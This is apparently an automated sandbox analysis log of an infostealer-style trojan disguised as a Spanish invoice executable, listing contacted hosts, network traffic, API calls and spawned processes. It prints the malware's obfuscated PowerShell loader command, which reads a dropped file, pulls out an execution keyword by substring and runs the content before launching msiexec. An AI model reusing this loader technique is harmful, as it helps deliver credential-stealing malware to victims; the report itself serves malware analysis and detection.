Source: powershell.exe, 00000002.00000002.2060874962.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000007.00000002.2682565213.00000000246AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2682565213.000000002471B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2682565213.0000000024742000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000007.00000002.2682565213.00000000246AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024742000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: msiexec.exe, 00000007.00000002.2682565213.00000000246D6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2682565213.000000002471B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2682565213.0000000024742000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: msiexec.exe, 00000007.00000003.2168707061.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2168590957.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000007.00000003.2168707061.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2168590957.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000007.00000003.2168707061.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2168590957.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000007.00000003.2168707061.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2168590957.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000007.00000003.2168707061.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2168590957.0000000008CD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000007.00000002.2682565213.0000000024841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000007.00000002.2682565213.000000002484B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49732 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405461

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\argoters\Necrotizing\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Jump to dropped file
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040338F
Detected potential crypto function
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_00406B15 0_2_00406B15
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_004072EC 0_2_004072EC
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_00404C9E 0_2_00404C9E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00C8E260 2_2_00C8E260
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_03235370 7_2_03235370
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323D278 7_2_0323D278
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323C146 7_2_0323C146
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323C738 7_2_0323C738
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323C468 7_2_0323C468
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323CA08 7_2_0323CA08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323E988 7_2_0323E988
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323CFAA 7_2_0323CFAA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323CCD8 7_2_0323CCD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_03233AA1 7_2_03233AA1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323F961 7_2_0323F961
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323E97A 7_2_0323E97A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_032369A0 7_2_032369A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_032339EE 7_2_032339EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_032329EC 7_2_032329EC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_03236FC8 7_2_03236FC8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_03233E09 7_2_03233E09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_03239DE0 7_2_03239DE0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C75FD8 7_2_26C75FD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C76678 7_2_26C76678
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C75FC7 7_2_26C75FC7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7B7C0 7_2_26C7B7C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C704C0 7_2_26C704C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C736C8 7_2_26C736C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7E2C8 7_2_26C7E2C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C79FC8 7_2_26C79FC8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7CAD1 7_2_26C7CAD1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C704D0 7_2_26C704D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C774D0 7_2_26C774D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C79FD8 7_2_26C79FD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C73FD8 7_2_26C73FD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7F5E1 7_2_26C7F5E1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7CAE0 7_2_26C7CAE0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C70DE0 7_2_26C70DE0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C787E0 7_2_26C787E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C73FE8 7_2_26C73FE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7F5E8 7_2_26C7F5E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C71FE8 7_2_26C71FE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7B2E8 7_2_26C7B2E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C748F7 7_2_26C748F7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C70DF0 7_2_26C70DF0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C787F0 7_2_26C787F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7DDF0 7_2_26C7DDF0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C716FF 7_2_26C716FF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C79AFF 7_2_26C79AFF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C76FFB 7_2_26C76FFB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C71FF8 7_2_26C71FF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7B2F8 7_2_26C7B2F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C71280 7_2_26C71280
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C79180 7_2_26C79180
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7A48F 7_2_26C7A48F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C74D89 7_2_26C74D89
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C72488 7_2_26C72488
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7BC88 7_2_26C7BC88
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C77988 7_2_26C77988
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C71B91 7_2_26C71B91
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7E790 7_2_26C7E790
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C72D9B 7_2_26C72D9B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C74D98 7_2_26C74D98
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C77998 7_2_26C77998
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7CFA6 7_2_26C7CFA6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C71BA0 7_2_26C71BA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7A4A0 7_2_26C7A4A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7B7AF 7_2_26C7B7AF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C78CA9 7_2_26C78CA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7FAA9 7_2_26C7FAA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C72DA8 7_2_26C72DA8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7CFA8 7_2_26C7CFA8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C756A8 7_2_26C756A8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C736B7 7_2_26C736B7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7FAB0 7_2_26C7FAB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C774BF 7_2_26C774BF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C756B8 7_2_26C756B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C78CB8 7_2_26C78CB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7E2B8 7_2_26C7E2B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7C143 7_2_26C7C143
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C70040 7_2_26C70040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C76B40 7_2_26C76B40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C73B4F 7_2_26C73B4F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7EC49 7_2_26C7EC49
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C75B48 7_2_26C75B48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C79648 7_2_26C79648
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7C150 7_2_26C7C150
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C70950 7_2_26C70950
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C77E50 7_2_26C77E50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C73B58 7_2_26C73B58
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7EC58 7_2_26C7EC58
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7A958 7_2_26C7A958
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C70960 7_2_26C70960
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C77E60 7_2_26C77E60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7D460 7_2_26C7D460
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7A968 7_2_26C7A968
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C74468 7_2_26C74468
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C76675 7_2_26C76675
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C79171 7_2_26C79171
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7D470 7_2_26C7D470
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C71270 7_2_26C71270
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7E77F 7_2_26C7E77F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C74478 7_2_26C74478
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C72478 7_2_26C72478
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7BC78 7_2_26C7BC78
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7DE00 7_2_26C7DE00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C74908 7_2_26C74908
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C77008 7_2_26C77008
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C72913 7_2_26C72913
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7C613 7_2_26C7C613
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C71710 7_2_26C71710
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C79B10 7_2_26C79B10
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7AE1F 7_2_26C7AE1F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C75219 7_2_26C75219
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C78319 7_2_26C78319
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7F119 7_2_26C7F119
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C72918 7_2_26C72918
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7C618 7_2_26C7C618
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7D927 7_2_26C7D927
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C70021 7_2_26C70021
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7F120 7_2_26C7F120
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7322F 7_2_26C7322F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C75228 7_2_26C75228
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C78328 7_2_26C78328
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C79637 7_2_26C79637
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7AE30 7_2_26C7AE30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C76B30 7_2_26C76B30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C75B39 7_2_26C75B39
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C73238 7_2_26C73238
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_26C7D938 7_2_26C7D938
Uses 32bit PE files
Source: FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/13@5/5
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040338F
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404722
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_00402104 CoCreateInstance, 0_2_00402104
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe File created: C:\Users\user\AppData\Roaming\argoters Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe File created: C:\Users\user\AppData\Local\Temp\nsi150C.tmp Jump to behavior
Source: FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe File read: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe "C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe"
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Caracara136=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Unlubricating.Svb';$Restrictiveness=$Caracara136.SubString(7453,3);.$Restrictiveness($Caracara136)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Caracara136=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Unlubricating.Svb';$Restrictiveness=$Caracara136.SubString(7453,3);.$Restrictiveness($Caracara136)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
